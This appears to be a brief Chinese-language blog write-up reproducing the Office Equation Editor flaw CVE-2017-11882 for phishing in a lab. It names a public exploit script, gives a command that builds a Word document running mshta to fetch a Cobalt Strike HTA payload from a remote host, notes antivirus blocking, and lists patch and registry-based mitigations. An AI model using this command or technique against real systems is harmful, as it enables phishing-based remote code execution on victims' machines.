CVE-2017-11882钓鱼

复现

office不久前爆的一个洞,影响范围还蛮大(Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016),所以复现下.

Tested on office 2013

使用的脚本:

https://github.com/Ridter/CVE-2017-11882

最多能执行109个字节的命令,还是有些限制的.

使用hta命令比较短,

先用cobalt strike生成hta(选powershell的),

然后生成doc,

1
python Command43b_CVE-2017-11882.py -c "mshta http://192.168.74.145/evil.hta" -o test.doc

测试的时候,360已经能拦截了.

换成msiexec也是一样的拦截,

需要确认才能上线

修复

  • 打补丁 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

  • 在注册表中禁用相关模块

    1
    reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
    1
    reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400